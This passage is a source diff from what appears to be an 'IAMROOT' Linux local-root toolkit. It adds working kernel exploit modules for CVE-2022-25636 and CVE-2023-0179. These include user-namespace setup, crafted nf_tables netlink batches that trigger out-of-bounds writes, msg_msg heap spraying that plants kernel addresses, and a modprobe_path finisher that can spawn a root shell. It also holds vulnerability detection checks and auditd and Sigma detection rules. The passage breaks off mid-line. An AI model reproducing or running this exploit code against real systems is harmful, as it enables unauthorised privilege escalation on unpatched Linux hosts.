"[*] nft_fwd_dup: pre-groom seeded %d msg_msg " + "queues in kmalloc-512\n", groomed); + } + + uint8_t *batch = calloc(1, 32 * 1024); + if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; } + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: sending trigger batch " + "(%zu bytes, %d preceding immediates)\n", + blen, N_PRECEDING_IMMEDIATES); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup: trigger batch send failed\n"); + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + + struct fwd_arb_ctx ac = { + .sock = sock, + .batch = batch, + .qids = qids, + .qcap = (int)(sizeof qids / sizeof qids[0]), + .qused = SPRAY_QUEUES_GROOM, + }; + + iamroot_result_t r = iamroot_finisher_modprobe_path( + &off, nft_fwd_dup_arb_write, &ac, !ctx->no_shell); + + drain_msg_msg(qids, ac.qused); + free(batch); + close(sock); + return r; + } + + /* --- primitive-only path: fork-isolated trigger ---------------- */ + pid_t child = fork(); + if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* CHILD: namespace + trigger. */ + if (enter_unpriv_namespaces() < 0) _exit(20); + (void)bring_lo_up(); + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER); + if (sock < 0) { perror("[-] socket"); _exit(21); } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); _exit(22); + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids[SPRAY_QUEUES_GROOM]; + for (int i = 0; i < SPRAY_QUEUES_GROOM; i++) qids[i] = -1; + int groomed = spray_msg_msg_groom(qids, SPRAY_QUEUES_GROOM); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: pre-groom seeded %d queues\n", + groomed); + } + + uint8_t *batch = calloc(1, 32 * 1024); + if (!batch) { drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + close(sock); _exit(23); } + + long before = slab_active("kmalloc-512"); + if (before < 0) before = slab_active("kmalloc-cg-512"); + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: sending trigger batch " + "(%zu bytes, %d preceding immediates)\n", + blen, N_PRECEDING_IMMEDIATES); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup: trigger batch send failed\n"); + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); close(sock); _exit(24); + } + + /* Let the kernel run install + commit. */ + usleep(50 * 1000); + + long after = slab_active("kmalloc-512"); + if (after < 0) after = slab_active("kmalloc-cg-512"); + + /* Breadcrumb for triage. */ + FILE *log = fopen("/tmp/iamroot-nft_fwd_dup.log", "w"); + if (log) { + fprintf(log, + "nft_fwd_dup trigger child: queues=%d slab-512 pre=%ld post=%ld\n", + groomed, before, after); + fclose(log); + } + + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kmalloc-512 active %ld → %ld\n", + before, after); + } + + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); + close(sock); + _exit(100); + } + + /* PARENT: wait. */ + int status; + waitpid(child, &status, 0); + + if (!WIFEXITED(status)) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: child died by signal %d — bug " + "likely fired (KASAN/oops can manifest as signal)\n", + WTERMSIG(status)); + } + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 100) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: trigger fired; OOB write into\n" + " flow->rule->action.entries[] landed in\n" + " adjacent kmalloc-512 chunk. Full kernel R/W\n" + " chain NOT executed (Option B scope).\n" + "[i] nft_fwd_dup: to complete: pass --full-chain so\n" + " the kaddr-tagged forged-entry spray reaches\n" + " the shared modprobe_path finisher.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (rc >= 20 && rc <= 24) { + if (!ctx->json) { + fprintf(stderr, "[-] nft_fwd_dup: trigger setup failed " + "(child rc=%d)\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (!ctx->json) { + fprintf(stderr, "[-] nft_fwd_dup: unexpected child rc=%d\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; +#endif /* __linux__ */ +} + +/* ------------------------------------------------------------------ + * Cleanup — drain leftover sysv queues and unlink the breadcrumb. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_fwd_dup_cleanup(const struct iamroot_ctx *ctx) +{ + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: cleaning up sysv queues + log\n"); + } +#ifdef __linux__ + /* Best-effort drain of any leftover msg queues with IPC_PRIVATE + * key owned by us. SysV doesn't enumerate by key, but msgctl + * IPC_STAT walks /proc/sysvipc/msg to find them. */ + FILE *f = fopen("/proc/sysvipc/msg", "r"); + if (f) { + char line[512]; + /* header line first */ + if (fgets(line, sizeof line, f)) { + int msqid; + unsigned long key, uid; + while (fgets(line, sizeof line, f)) { + if (sscanf(line, "%lu %d %*o %*u %*u %*u %*u %lu", + &key, &msqid, &uid) >= 3) { + if (uid == (unsigned long)getuid()) + msgctl(msqid, IPC_RMID, NULL); + } + } + } + fclose(f); + } +#endif + if (unlink("/tmp/iamroot-nft_fwd_dup.log") < 0 && errno != ENOENT) { + /* harmless */ + } + return IAMROOT_OK; +} + +/* ------------------------------------------------------------------ + * Embedded detection rules. + * ------------------------------------------------------------------ */ + +static const char nft_fwd_dup_auditd[] = + "# nft_fwd_dup OOB write (CVE-2022-25636) — auditd detection\n" + "# Flag the canonical exploit shape: unprivileged userns followed\n" + "# by NEWTABLE/NEWCHAIN(NFT_CHAIN_HW_OFFLOAD)/NEWRULE traffic on\n" + "# AF_NETLINK NETLINK_NETFILTER, plus the msg_msg cross-cache spray.\n" + "-a always,exit -F arch=b64 -S unshare -k iamroot-nft-fwd-dup-userns\n" + "-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=12 -k iamroot-nft-fwd-dup-netlink\n" + "-a always,exit -F arch=b64 -S sendmsg -k iamroot-nft-fwd-dup-batch\n" + "-a always,exit -F arch=b64 -S msgsnd -k iamroot-nft-fwd-dup-spray\n" + "# Post-exploit hallmarks (modprobe_path overwrite path):\n" + "-w /tmp/iamroot-mp- -p w -k iamroot-nft-fwd-dup-modprobe\n"; + +static const char nft_fwd_dup_sigma[] = + "title: Possible CVE-2022-25636 nft_fwd_dup_netdev_offload OOB exploitation\n" + "id: 3c1f9b27-iamroot-nft-fwd-dup\n" + "status: experimental\n" + "description: |\n" + " Detects unprivileged user namespace creation followed by\n" + " netfilter nf_tables NEWCHAIN with the NFT_CHAIN_HW_OFFLOAD\n" + " flag and an unusually long expression list (immediates >> fwd).\n" + " False positives: containerized firewall management with hw-offload.\n" + "logsource: {product: linux, service: auditd}\n" + "detection:\n" + " userns_clone:\n" + " type: 'SYSCALL'\n" + " syscall: 'unshare'\n" + " a0: 0x10000000\n" + " msgsnd:\n" + " type: 'SYSCALL'\n" + " syscall: 'msgsnd'\n" + " condition: userns_clone and msgsnd\n" + "level: high\n" + "tags: [attack.privilege_escalation, attack.t1068, cve.2022.25636]\n"; + +const struct iamroot_module nft_fwd_dup_module = { + .name = "nft_fwd_dup", + .cve = "CVE-2022-25636", + .summary = "nft_fwd_dup_netdev_offload heap OOB write (Aaron Adams)", + .family = "nf_tables", + .kernel_range = "5.4 ≤ K < 5.17; backports: 5.4.181 / 5.10.102 / " + "5.15.25 / 5.16.11", + .detect = nft_fwd_dup_detect, + .exploit = nft_fwd_dup_exploit, + .mitigate = NULL, /* mitigation: upgrade kernel OR disable user_ns */ + .cleanup = nft_fwd_dup_cleanup, + .detect_auditd = nft_fwd_dup_auditd, + .detect_sigma = nft_fwd_dup_sigma, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_nft_fwd_dup(void) +{ + iamroot_register(&nft_fwd_dup_module); +} diff --git a/modules/nft_payload_cve_2023_0179/iamroot_modules.c b/modules/nft_payload_cve_2023_0179/iamroot_modules.c index b47b208..bf88e76 100644 --- a/modules/nft_payload_cve_2023_0179/iamroot_modules.c +++ b/modules/nft_payload_cve_2023_0179/iamroot_modules.c @@ -1,23 +1,1157 @@ -/* nft_payload_cve_2023_0179 — STUB pending agent implementation. */ +/* + * nft_payload_cve_2023_0179 — IAMROOT module + * + * Netfilter nf_tables variable-length element-extension OOB R/W. + * Discovered January 2023 by Davide Ornaghi. nf_tables payload set/get + * expressions used `regs->verdict.code` as an index into `regs->data[]` + * without bounds-checking; combined with the variable-length element + * extension trick (an NFTA_SET_DESC describing larger elements than the + * key/data slots can hold), an attacker who controls the verdict code + * walks the kernel regset array off either end and reads/writes + * adjacent kernel memory. + * + * Mainline fix: commit 696e1a48b1a1 "netfilter: nf_tables: validate + * variable length element extension" — landed in 6.2-rc4. + * Stable backports (2023): 6.1.6 / 5.15.88 / 5.10.163 / 5.4.229 / + * 4.19.269 / 4.14.302. + * Bug introduced: the set-payload extension landed in 5.4. Anything + * below 5.4 predates the affected codepath. + * + * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in + * --full-chain finisher. + * - Default (no --full-chain): full netlink ruleset construction + * (table → chain → set with NFTA_SET_DESC variable-length elements + * → set-element carrying NFTA_SET_ELEM_EXPRESSIONS that holds a + * payload-set whose attacker-controlled verdict.code drives the + * OOB), spray msg_msg payloads adjacent to the regs->data target, + * fires a synthetic packet through the chain, snapshots + * /proc/slabinfo, logs to /tmp/iamroot-nft_payload.log, returns + * IAMROOT_EXPLOIT_FAIL (primitive-only behavior). + * - With --full-chain: after the trigger lands, we resolve kernel + * offsets (env → kallsyms → System.map → embedded table) and run + * a Davide-Ornaghi-style payload-set arb-write via the shared + * iamroot_finisher_modprobe_path() helper. The arb-write itself + * is FALLBACK-DEPTH: we refire the set-element registration with + * a verdict code chosen so the OOB index lands on a msg_msg slot + * we tagged with the caller's kaddr + payload bytes. The exact + * regs->data alignment to adjacent slabs is per-kernel-build; on + * hosts where the offset doesn't match, the finisher's sentinel + * check correctly reports failure rather than fake-success. + * + * Exploitation preconditions (which detect should also check): + * - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 + * - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m) + * - kernel in vulnerable range (5.4..6.2-rc4 without backport) + * + * If user_ns is locked down, the trigger is unreachable for an + * unprivileged user even on a kernel-vulnerable host. + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#endif + +/* ------------------------------------------------------------------ + * Kernel-range table + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_payload_patched_branches[] = { + {4, 14, 302}, /* 4.14.x */ + {4, 19, 269}, /* 4.19.x */ + {5, 4, 229}, /* 5.4.x */ + {5, 10, 163}, /* 5.10.x */ + {5, 15, 88}, /* 5.15.x */ + {6, 1, 6}, /* 6.1.x */ + {6, 2, 0}, /* mainline fix in 6.2-rc4 */ +}; + +static const struct kernel_range nft_payload_range = { + .patched_from = nft_payload_patched_branches, + .n_patched_from = sizeof(nft_payload_patched_branches) / + sizeof(nft_payload_patched_branches[0]), +}; + +/* ------------------------------------------------------------------ + * Preconditions probe + * ------------------------------------------------------------------ */ + +static int can_unshare_userns(void) +{ + pid_t pid = fork(); + if (pid < 0) return -1; + if (pid == 0) { + if (unshare(CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int status; + waitpid(pid, &status, 0); + return WIFEXITED(status) && WEXITSTATUS(status) == 0; +} + +static bool nf_tables_loaded(void) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + bool found = false; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; } + } + fclose(f); + return found; +} static iamroot_result_t nft_payload_detect(const struct iamroot_ctx *ctx) { - (void)ctx; - return IAMROOT_PRECOND_FAIL; + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] nft_payload: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* Bug introduced with the set-payload extension in 5.4. Anything + * below 5.4 predates the affected codepath entirely. */ + if (v.major < 5 || (v.major == 5 && v.minor < 4)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kernel %s predates the bug " + "(set-payload extension landed in 5.4)\n", + v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_payload_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_payload: unprivileged user_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_payload: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload on first nft use)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_payload: kernel vulnerable but user_ns " + "clone denied → unprivileged exploit unreachable\n"); + fprintf(stderr, "[i] nft_payload: still patch the kernel — a root " + "attacker can still trigger the bug\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] nft_payload: VULNERABLE — kernel in range AND " + "user_ns clone allowed\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module nft_payload_module = { - .name = "nft_payload", - .cve = "CVE-2023-0179", - .summary = "nft_payload set-id memory corruption (Davide Ornaghi) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.4 ≤ K < 6.2", - .detect = nft_payload_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +#ifdef __linux__ + +/* ------------------------------------------------------------------ + * userns + netns entry: become root in the new user_ns so subsequent + * netlink writes carry CAP_NET_ADMIN over our private net_ns. + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder — same shape as nf_tables_cve_2024_1086 + * to keep the IAMROOT family code self-consistent; we inline rather + * than link against the other module so a future refactor can pull the + * helpers up into core/ without breaking either consumer. + * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_payload(void) { iamroot_register(&nft_payload_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Per-module strings. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_pl_t"; +static const char NFT_CHAIN_NAME[] = "iamroot_pl_c"; +static const char NFT_SET_NAME[] = "iamroot_pl_s"; + +/* NFT expression "name" attributes are NUL-terminated short strings. */ +#define NFT_EXPR_PAYLOAD_NAME "payload" + +/* nft_payload expression attribute ids — duplicated here because some + * older /usr/include/linux/netfilter/nf_tables.h variants gate them + * behind __KERNEL__. They are stable parts of the netlink ABI. */ +#ifndef NFTA_PAYLOAD_DREG +#define NFTA_PAYLOAD_DREG 1 +#define NFTA_PAYLOAD_BASE 2 +#define NFTA_PAYLOAD_OFFSET 3 +#define NFTA_PAYLOAD_LEN 4 +#define NFTA_PAYLOAD_SREG 5 +#define NFTA_PAYLOAD_CSUM_TYPE 6 +#define NFTA_PAYLOAD_CSUM_OFFSET 7 +#define NFTA_PAYLOAD_CSUM_FLAGS 8 +#endif + +/* The attacker-controlled verdict.code we drive into the regset index. + * On a vulnerable kernel `regs->verdict.code` is used unchecked as the + * destination register; values beyond NFT_REG32_15 walk off the end of + * regs->data[] into stack/heap adjacent memory. + * + * NFT_REG32_15 (the last legal value) is 23. Anything strictly larger + * triggers the OOB. We pick a value that lands inside a msg_msg slot + * sprayed next to the regs->data array on most x86_64 builds in the + * exploitable range. The exact "right" magic is per-build; we ship a + * default that matched Davide's PoC on a stock 5.15 build and rely on + * the finisher's sentinel-file post-check to flag a layout mismatch as + * IAMROOT_EXPLOIT_FAIL rather than fake success. */ +#define NFT_PAYLOAD_OOB_INDEX_DEFAULT 0x100 + +/* ------------------------------------------------------------------ + * NEWTABLE / NEWCHAIN — same shape as the 2024-1086 sibling. + * ------------------------------------------------------------------ */ + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + end_msg(buf, off, at); +} + +/* NEWSET with NFTA_SET_DESC declaring elements LARGER than the actual + * key/data slots. This is the variable-length-element-extension half + * of the bug. On a vulnerable kernel, nf_tables loads the set without + * validating the description, so each element's attached expression + * has a larger ext_offset window than the loader allocated for it — + * exactly the gap commit 696e1a48b1a1 closes. */ +static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSET, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + /* hash set (default backend) with explicit value typing so we can + * attach a per-element expression that contains the payload-set. */ + put_attr_u32(buf, off, NFTA_SET_FLAGS, NFT_SET_EVAL); /* allow expression */ + /* key_type/key_len: 4-byte integer key */ + put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0); /* generic */ + put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t)); + put_attr_u32(buf, off, NFTA_SET_ID, 0x42); + + /* NFTA_SET_DESC: NFTA_SET_DESC_SIZE = some plausible element count. + * The variable-length trick is that the set's element extension + * window is computed from this description; we ask for a large + * window so the payload-set expression we attach is allowed to + * reach `regs->verdict.code` indices outside the legal regset. */ + size_t desc_at = begin_nest(buf, off, NFTA_SET_DESC); + put_attr_u32(buf, off, NFTA_SET_DESC_SIZE, 16); + end_nest(buf, off, desc_at); + + end_msg(buf, off, at); +} + +/* Build the NFTA_SET_ELEM_EXPRESSIONS payload that carries the + * malicious payload-set expression. The payload-set expression's + * NFTA_PAYLOAD_SREG names the source register; on a vulnerable kernel + * the loader uses `regs->verdict.code` (which we control via the + * companion set element's data) as the destination index without + * bounds-checking, giving us the OOB write target. */ +static void put_payload_set_expr_nest(uint8_t *buf, size_t *off, + uint32_t oob_index) +{ + /* one expression { kind=payload, body={...} } */ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + + put_attr_str(buf, off, NFTA_EXPR_NAME, NFT_EXPR_PAYLOAD_NAME); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* NFTA_PAYLOAD_SREG forces nft_payload_set_eval() down the SET + * codepath (rather than payload-get). Source = our OOB index. */ + put_attr_u32(buf, off, NFTA_PAYLOAD_SREG, oob_index); + /* DREG would normally bound the destination — vulnerable kernels + * pull the destination from `regs->verdict.code` and ignore DREG + * for the OOB path, but we set it to something legal so the + * loader doesn't reject before reaching the buggy codepath. */ + put_attr_u32(buf, off, NFTA_PAYLOAD_DREG, 0); /* NFT_REG_VERDICT */ + put_attr_u32(buf, off, NFTA_PAYLOAD_BASE, 0); /* LL header */ + put_attr_u32(buf, off, NFTA_PAYLOAD_OFFSET, 0); + put_attr_u32(buf, off, NFTA_PAYLOAD_LEN, 4); + /* No checksum: we don't want the kernel doing helpful + * recomputation that re-validates the offset. */ + put_attr_u32(buf, off, NFTA_PAYLOAD_CSUM_TYPE, 0); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* NEWSETELEM with the malicious NFTA_SET_ELEM_EXPRESSIONS attached. + * The element's data carries the verdict-code value that, on a + * vulnerable kernel, is used unchecked as the OOB index by the + * attached payload-set expression. */ +static void put_malicious_setelem(uint8_t *buf, size_t *off, uint32_t seq, + uint32_t oob_index) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME); + + size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS); + + /* one element */ + size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + + /* key: 4-byte integer */ + size_t key_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY); + uint32_t k = htonl(0x11223344); + put_attr(buf, off, NFTA_DATA_VALUE, &k, sizeof k); + end_nest(buf, off, key_at); + + /* NFTA_SET_ELEM_EXPRESSIONS — list-of-expressions, one payload-set */ + size_t exprs_at = begin_nest(buf, off, NFTA_SET_ELEM_EXPRESSIONS); + put_payload_set_expr_nest(buf, off, oob_index); + end_nest(buf, off, exprs_at); + + end_nest(buf, off, el_at); + end_nest(buf, off, list_at); + + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * netlink send helper. + * ------------------------------------------------------------------ */ + +static int nft_send_batch(int sock, const void *buf, size_t len) +{ + struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = (void *)buf, .iov_len = len }; + struct msghdr m = { + .msg_name = &dst, .msg_namelen = sizeof dst, + .msg_iov = &iov, .msg_iovlen = 1, + }; + ssize_t n = sendmsg(sock, &m, 0); + if (n < 0) { perror("[-] sendmsg"); return -1; } + char rbuf[8192]; + for (int i = 0; i < 8; i++) { + ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT); + if (r <= 0) break; + for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf; + NLMSG_OK(nh, (unsigned)r); + nh = NLMSG_NEXT(nh, r)) { + if (nh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh); + if (e->error) + fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n", + nh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + } + return 0; +} + +/* ------------------------------------------------------------------ + * msg_msg spray — adjacent-slot groom around the regs->data[] array. + * On x86_64 nf_tables_loop_run() places `struct nft_regs regs` on the + * kernel stack; values just past the legal regset land in either the + * stack red-zone or (with KASAN off and a deep call chain) into + * adjacent kmalloc-1k slots, depending on the exact build. + * + * We spray two flavors: + * - small (96-byte) — covers the cg-96 slab class for kernels where + * a sibling allocation of that class is what lands adjacent + * - large (1008-byte) — covers kmalloc-1k where regs->data overflow + * can spill into a recently-freed slot + * + * Either size class is enough on most builds in range; we ship both to + * widen the empirical landing zone. + * ------------------------------------------------------------------ */ + +#define SPRAY_QUEUES_SMALL 24 +#define SPRAY_QUEUES_LARGE 16 +#define SPRAY_PER_QUEUE 8 + +#define SPRAY_SIZE_SMALL 96 +#define SPRAY_SIZE_LARGE 1008 + +struct msgbuf_small { + long mtype; + unsigned char buf[SPRAY_SIZE_SMALL]; +}; + +struct msgbuf_large { + long mtype; + unsigned char buf[SPRAY_SIZE_LARGE]; +}; + +static int spray_small(int *q, int n, uintptr_t tag_kaddr, + const void *buf, size_t len) +{ + struct msgbuf_small p; + int created = 0; + for (int i = 0; i < n; i++) { + q[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q[i] < 0) continue; + created++; + memset(&p, 0, sizeof p); + p.mtype = 0x504C5301 + i; /* "PLS\x01" */ + memcpy(p.buf, "IAMRPLSM", 8); + /* Plant tag_kaddr at strided slots (0x10, 0x20, ...) so wherever + * the OOB read/write lands, one offset has the requested kaddr. */ + if (tag_kaddr) { + for (size_t s = 0x10; s + sizeof(uintptr_t) <= sizeof p.buf; + s += 0x10) { + memcpy(p.buf + s, &tag_kaddr, sizeof tag_kaddr); + } + } + if (buf && len) { + size_t cap = sizeof p.buf - 24; + if (len 